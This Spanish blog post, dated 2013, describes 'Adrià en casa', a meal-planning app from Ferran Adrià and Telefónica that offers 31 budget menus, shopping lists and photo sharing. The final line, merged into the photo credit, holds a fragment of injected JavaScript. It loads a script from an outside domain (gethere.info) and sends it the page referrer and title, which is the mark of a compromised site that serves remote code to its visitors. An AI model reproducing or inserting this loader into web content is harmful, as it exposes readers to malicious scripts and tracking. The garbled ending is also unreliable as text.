Adrià en casa

18/01/2013

Gracias a una nueva aplicación -llamada Adrià en casa– lanzada por Adrià de la mano de Telefónica, podrás elaborar menús basados en los platos que comía el staff de El Bulli o concocer los entresijos de dicho restaurante, uno de los más famosos del mundo. Tengas ipad, Android o ISOS, puedes tener a Ferrán Adrià en tu casa de esta manera tan especial :-).

La aplicación va más allá de ser «un simple libro de recetas», ya que, lo primero que hace es ayudarte a organizar tus comidas. Desde con cuánta antelación has de comprar los ingredientes hasta elaborar un plan de comidas semanal: equilibrado, variado y sano, a un precio más que razonable. Las propuestas pueden ser por plato individual o por menú completo (primero, segundo y postre). En total la aplicación ofrece 31 menús diferentes, rondando la ejecución de cada uno entre 3 y 5 euros. La variedad de platos es grande: desde los más tradicionales hasta los menos convencionales, siendo guisantes con jamón o nachos con guacamole dos buenos ejemplos de ambas opciones.

Además, puedes personalizar la aplicación, lo que te permitirá ir haciendo anotaciones de los platos y menús, gestionar tu lista de la compra, o sacar fotos de los platos elaborados para almacenarlas y compartirlas con quien tu quieras. Estad alerta, porque esta opción es solo el primer proyecto de los muchos que se lanzarán a través de esta aplicación. En un futuro nos ofrecerán también juegos gastronómicos, cursos de cocina on line y un largo etcétera.

Foto | Renée S.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;